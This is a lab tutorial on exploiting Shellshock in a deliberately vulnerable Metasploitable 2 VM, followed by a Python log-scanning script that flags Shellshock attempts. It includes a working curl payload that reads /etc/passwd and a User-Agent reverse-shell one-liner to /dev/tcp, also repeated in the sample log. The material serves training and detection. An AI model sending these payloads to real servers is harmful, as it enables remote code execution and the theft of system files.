Metasploitable 2 doesn’t come with the Shellshock vulnerability. But that doesn’t mean we can’t put one there. This tutorial will show you how to exploit Shellshock on Metasploitable 2 by Rapid7.
What Is The Shellshock Vulnerability?
Vulnerable versions of bash allow arbitrary code execution. The flaw lies in the way bash imports environment variables that contain a function definition: any trailing commands after the function definition are erroneously executed, resulting in code execution. The vulnerability exists in all bash versions up to version 4.3.
Apache web servers use the Common Gateway Interface (CGI) to handle web requests. Bash receives the request data as environment variables from the server and processes them, so a maliciously crafted request can be used to trigger this flaw in a vulnerable version of bash.
In this tutorial the Shellshock vulnerability is attacked in the context of a web application: Apache CGI scripts which don’t require authentication.
By targeting these scripts and placing a malicious function definition in the User-Agent header (which CGI passes to the script as the HTTP_USER_AGENT environment variable), we can exploit the vulnerability to get a reverse shell back to the Kali box.
Setting Up Metasploitable 2 Shellshock Vulnerability
While Metasploitable 2 does not come with the Shellshock vulnerability (a nikto scan confirms this), we can create one. This is done by creating a simple CGI bash script on the VM that displays a message in HTML. Log in to the target and run the following commands:
- sudo su (enter msfadmin)
- cd /usr/lib/cgi-bin
- Write the following to shellshock.sh:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Exploit Me!"
- chmod 755 shellshock.sh
Apache needs the Content-type header followed by a blank line in order to render the script’s output.
Now open the Kali Linux VM and view the web page by going to http://<m2ip>/cgi-bin/shellshock.sh (where m2ip is the IP address of the Metasploitable 2 VM).
Exploit Shellshock Using Curl
Use the following command to execute “cat /etc/passwd” on the Metasploitable 2 machine remotely from Kali Linux:
[root@kali] $ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://m2ip/cgi-bin/shellshock.sh
Exploit Shellshock Using Burp Suite
In the User-Agent header I have put the bash one-liner reverse shell to be executed on the target.
User-Agent: () { :; };/bin/bash -i >& /dev/tcp/10.0.0.2/1234 0>&1
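Both requests above (the curl command and the Burp one-liner) leave the same fingerprint in the web server’s access log: a User-Agent value that begins with an empty function definition, “() {”. The following Python script is an added example for the defender’s side and is not part of the original tutorial; it parses Apache combined-format log lines and flags requests that carry a Shellshock-style function definition in any header field the log records (User-Agent and Referer), since CGI exports every request header as an environment variable. The log lines embedded in it are constructed for the example and reuse the two payloads shown on this page.

```python
import re
from typing import Dict, Iterable, List, Optional

# Apache "combined" log format:
#   client ident user [time] "method path proto" status size "referer" "user-agent"
# Note: real Apache logs escape embedded double quotes as \" inside a field;
# this simple pattern does not handle that case and is enough for the sample below.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Shellshock payload is an (empty) bash function definition, "() {", followed by
# trailing commands. Matching the function-definition prefix catches every variant
# regardless of which command follows it.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Header-derived fields that CGI turns into environment variables for the script.
HEADER_FIELDS = ("agent", "referer")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format log line; return None for lines that do not fit."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def find_shellshock_attempts(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per log line whose request headers carry a Shellshock payload."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the scan
        for field in HEADER_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "client": rec["client"],
                    "time": rec["time"],
                    "path": rec["path"],
                    "field": field,
                    "payload": rec[field],
                    # CGI scripts are the exposure described in the tutorial; flag them explicitly
                    "cgi_target": rec["path"].startswith("/cgi-bin/"),
                    "status": rec["status"],
                })
                break  # one finding per line is enough
    return hits


# Constructed sample log (not taken from a real server): two benign requests, the
# curl payload from this page, the Burp reverse-shell payload from this page, and
# one malformed line.
SAMPLE_LOG = [
    '10.0.0.2 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/shellshock.sh HTTP/1.1" 200 45 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [10/Oct/2014:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 312 "-" "SomeBot/1.0 ()"',
    '10.0.0.2 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/shellshock.sh HTTP/1.1" 200 1843 "-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.0.0.2 - - [10/Oct/2014:13:57:12 +0000] "GET /cgi-bin/shellshock.sh HTTP/1.1" 500 0 "-" "() { :; };/bin/bash -i >& /dev/tcp/10.0.0.2/1234 0>&1"',
    'this line is not in combined format',
]


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} -> {hit["path"]} '
              f'[{hit["field"]}] status={hit["status"]} payload={hit["payload"]!r}')
```

Run against the constructed sample, the script reports the two payload-bearing requests and ignores both benign lines, including the one whose User-Agent contains a bare “()” without the opening brace. The 200 response with 1843 bytes in the curl line (versus 45 bytes for the normal page) is a useful second signal: the extra “echo; echo;” in that payload lets the command output be returned in the HTTP response, so a response-size spike on a tiny CGI script is worth alerting on even if header inspection is unavailable. The mitigation is simply to patch bash; the regex can then be kept as a low-noise indicator of scanning activity.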
How To Exploit Shellshock With Metasploit
You can exploit the Shellshock vulnerability with Metasploit by using its module for this flaw, setting the required options, and running the exploit module.
Recommended Reading
Want to learn more ethical hacking? I highly recommend buying my book for beginners to pentesting, Become An Ethical Hacker. Check the price on Amazon.